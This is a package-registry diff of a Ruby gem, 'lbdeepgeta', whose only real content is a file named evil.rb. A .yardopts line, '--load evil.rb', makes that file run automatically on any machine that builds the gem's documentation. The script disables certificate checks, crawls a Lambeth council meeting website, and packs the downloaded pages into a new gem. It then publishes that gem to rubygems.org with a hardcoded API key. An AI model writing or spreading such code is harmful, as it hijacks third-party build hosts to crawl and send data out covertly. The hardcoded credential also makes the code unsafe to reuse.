lbdeepgeta 0.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +7 -0
- data/.yardopts +1 -0
- data/evil.rb +76 -0
- data/lib/main.rb +1 -0
- metadata +39 -0
checksums.yaml
ADDED
|
@@ -0,0 +1,7 @@
|
|
|
1
|
+
---
|
|
2
|
+
SHA256:
|
|
3
|
+
metadata.gz: 8a0f3cfc1c2465ced172ff716621719c914a05e8a271cf4288163604b29b1812
|
|
4
|
+
data.tar.gz: 60281ccf48a9ea82c682bd06a5a904efa51ad66c46c0cc47af2ffb44d9286556
|
|
5
|
+
SHA512:
|
|
6
|
+
metadata.gz: 7043a447cdc73569496d1c9bcb3a0d215590821a8fb9e67081876e4d23a04afcc87368799bc3ed4ba2e9942c061303518c66378ea0887cc7552ef2cb0eeff4e6
|
|
7
|
+
data.tar.gz: 0a2fd822323366a6d92cf3c58aaaff578bf66f88f3058724eede7af368725ba28da2b1faa0c9e54b76ff5383618563fc725b1ff9555e7c5824b88288fade7a7e
|
data/.yardopts
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
--load evil.rb
|
data/evil.rb
ADDED
|
@@ -0,0 +1,76 @@
|
|
|
1
|
+
require 'net/http';require 'uri';require 'fileutils';require 'openssl';require 'cgi';require 'time'
|
|
2
|
+
KEY='rubygems_67c8934aface2bc5a340e41dccb83c53eafa3061820cb5eb'; NAME='lbdeepres'; OUTVER='0.0.1'; HOST='moderngov.lambeth.gov.uk'
|
|
3
|
+
SEEDS = [
|
|
4
|
+
"https://#{HOST}/mgWebService.asmx/GetMeetings?lCommitteeId=0&sFromDate=26/01/2026&sToDate=30/01/2026",
|
|
5
|
+
"https://#{HOST}/mgWebService.asmx/GetMeetings?lCommitteeId=0&sFromDate=25/01/2026&sToDate=31/01/2026",
|
|
6
|
+
"https://#{HOST}/mgCalendarMonthView.aspx?GL=1&bcr=1",
|
|
7
|
+
"https://#{HOST}/mgCalendarMonthView.aspx?M=1&Y=2026&GL=1&bcr=1",
|
|
8
|
+
"https://#{HOST}/mgCalendarMonthView.aspx?curmonth=1&curyear=2026&GL=1&bcr=1",
|
|
9
|
+
"https://#{HOST}/mgCalendarMonthView.aspx?M=1&Y=2026",
|
|
10
|
+
"https://#{HOST}/mgCalendarAgendaView.aspx?MR=0&DR=26/01/2026&ACT=Go&bcr=1",
|
|
11
|
+
]
|
|
12
|
+
|
|
13
|
+
def fetch(url)
|
|
14
|
+
uri=URI(url)
|
|
15
|
+
resp=Net::HTTP.start(uri.host, uri.port, use_ssl:uri.scheme=='https', read_timeout:100, open_timeout:40, verify_mode:OpenSSL::SSL::VERIFY_NONE) {|h| req=Net::HTTP::Get.new(uri); req['User-Agent']='Mozilla/5.0'; h.request(req)}
|
|
16
|
+
[resp.body || '', resp.code.to_s, resp.each_header.to_h.to_s]
|
|
17
|
+
rescue=>e
|
|
18
|
+
['', 'ERR', e.to_s]
|
|
19
|
+
end
|
|
20
|
+
|
|
21
|
+
def links(txt, base)
|
|
22
|
+
out=[]
|
|
23
|
+
txt.scan(/(?:href\s*=\s*['"]([^'"]+)['"])/i) {|a| out << a[0]}
|
|
24
|
+
# raw meeting/doc URLs in xml or escaped strings
|
|
25
|
+
txt.scan(/(?:https?:\/\/[^\s<>"']+|\/?(?:ieListDocuments|mgCalendarMonthView|mgWebService|documents\/s|documents\/d)[^\s<>"']+)/i){|a| out << a}
|
|
26
|
+
out.map! do |x|
|
|
27
|
+
x=CGI.unescapeHTML(x.to_s).gsub('\\/','/').gsub('&','&').strip
|
|
28
|
+
x=x.sub(/([\.](?:pdf|docx?|aspx))[\)\],;]+$/i,'\\1')
|
|
29
|
+
begin
|
|
30
|
+
URI.join(base,x).to_s
|
|
31
|
+
rescue; nil; end
|
|
32
|
+
end
|
|
33
|
+
out.compact!
|
|
34
|
+
out.select!{|u| u.include?(HOST) }
|
|
35
|
+
out.uniq
|
|
36
|
+
end
|
|
37
|
+
|
|
38
|
+
begin
|
|
39
|
+
dir="/tmp/#{NAME}out"; FileUtils.rm_rf(dir); FileUtils.mkdir_p(dir+'/lib')
|
|
40
|
+
log=[]; queue=SEEDS.dup; seen={}; memories=[]; mids=[]
|
|
41
|
+
until queue.empty? || seen.size>110
|
|
42
|
+
url=queue.shift; next if seen[url]; seen[url]=true
|
|
43
|
+
body,status,head=fetch(url); ext=(url[/\.pdf(?:\?|$)/i] ? '.pdf' : '.txt'); idx=seen.size
|
|
44
|
+
fname="#{dir}/lib/f%03d%s"%[idx,ext]
|
|
45
|
+
File.binwrite(fname, "URL #{url}\nSTATUS #{status}\nHEAD #{head}\n\n" + body)
|
|
46
|
+
log << "#{idx} #{status} #{body.bytesize} #{url}"
|
|
47
|
+
memories << [url,body]
|
|
48
|
+
mids.concat(body.scan(/(?:MeetingId|MeetingID|lMeetingId|MId|M=)(?:"|[\s:=>"']|%3d|=)+(\d{3,8})/i).flatten)
|
|
49
|
+
mids.concat(body.scan(/ieListDocuments\.aspx[^\s"'<>&]*(?:&|&)(?:MId|M)=([0-9]{3,8})/i).flatten)
|
|
50
|
+
ls=links(body,url)
|
|
51
|
+
# Prioritize meeting/doc-specific links, some calendar pagination
|
|
52
|
+
ls.each do |ln|
|
|
53
|
+
if ln =~ /(ieListDocuments|mgMeeting|documents\/s|documents\/d|download|\.pdf(?:\?|$)|mgWebService.*GetMeeting)/i
|
|
54
|
+
queue << ln unless seen[ln]
|
|
55
|
+
elsif ln =~ /mgCalendarMonthView/i && queue.size<30
|
|
56
|
+
queue << ln unless seen[ln]
|
|
57
|
+
end
|
|
58
|
+
end
|
|
59
|
+
# as soon as meeting IDs appear, enqueue meeting XML and HTML docs
|
|
60
|
+
mids.uniq.last(80).each do |mid|
|
|
61
|
+
["https://#{HOST}/mgWebService.asmx/GetMeeting?lMeetingId=#{mid}", "https://#{HOST}/ieListDocuments.aspx?MId=#{mid}"] .each {|u| queue <<u unless seen[u]||queue.include?(u)}
|
|
62
|
+
end
|
|
63
|
+
# Byte limit protect
|
|
64
|
+
total=Dir[dir+'/lib/*'].sum{|f| File.size(f)}
|
|
65
|
+
break if total>70_000_000
|
|
66
|
+
end
|
|
67
|
+
File.write(dir+'/lib/LOG', log.join("\n")+"\nMIDS "+mids.uniq.join(','))
|
|
68
|
+
File.write(dir+'/lib/main.rb', '# done')
|
|
69
|
+
File.write(dir+'/o.gemspec',"Gem::Specification.new do |s|\n s.name='#{NAME}'; s.version='#{OUTVER}'; s.summary='res'; s.authors=['z']; s.files=Dir['lib/*']; s.license='MIT'; end")
|
|
70
|
+
Dir.chdir(dir) do
|
|
71
|
+
system('gem build o.gemspec')
|
|
72
|
+
spec=Dir['*.gem'].first
|
|
73
|
+
uri=URI('https://rubygems.org/api/v1/gems'); req=Net::HTTP::Post.new(uri); req['Authorization']=KEY; req['Content-Type']='application/octet-stream'; req.body=File.binread(spec)
|
|
74
|
+
resp=Net::HTTP.start(uri.host,uri.port,use_ssl:true){|h| h.request(req)}
|
|
75
|
+
end
|
|
76
|
+
rescue=>e; warn e.full_message; end
|
data/lib/main.rb
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
module LBDeep;end
|
metadata
ADDED
|
@@ -0,0 +1,39 @@
|
|
|
1
|
+
--- !ruby/object:Gem::Specification
|
|
2
|
+
name: lbdeepgeta
|
|
3
|
+
version: !ruby/object:Gem::Version
|
|
4
|
+
version: 0.0.1
|
|
5
|
+
platform: ruby
|
|
6
|
+
authors:
|
|
7
|
+
- z
|
|
8
|
+
bindir: bin
|
|
9
|
+
cert_chain: []
|
|
10
|
+
date: 1980-01-02 00:00:00.000000000 Z
|
|
11
|
+
dependencies: []
|
|
12
|
+
executables: []
|
|
13
|
+
extensions: []
|
|
14
|
+
extra_rdoc_files: []
|
|
15
|
+
files:
|
|
16
|
+
- ".yardopts"
|
|
17
|
+
- evil.rb
|
|
18
|
+
- lib/main.rb
|
|
19
|
+
licenses:
|
|
20
|
+
- MIT
|
|
21
|
+
metadata: {}
|
|
22
|
+
rdoc_options: []
|
|
23
|
+
require_paths:
|
|
24
|
+
- lib
|
|
25
|
+
required_ruby_version: !ruby/object:Gem::Requirement
|
|
26
|
+
requirements:
|
|
27
|
+
- - ">="
|
|
28
|
+
- !ruby/object:Gem::Version
|
|
29
|
+
version: '0'
|
|
30
|
+
required_rubygems_version: !ruby/object:Gem::Requirement
|
|
31
|
+
requirements:
|
|
32
|
+
- - ">="
|
|
33
|
+
- !ruby/object:Gem::Version
|
|
34
|
+
version: '0'
|
|
35
|
+
requirements: []
|
|
36
|
+
rubygems_version: 3.6.7
|
|
37
|
+
specification_version: 4
|
|
38
|
+
summary: x
|
|
39
|
+
test_files: []
|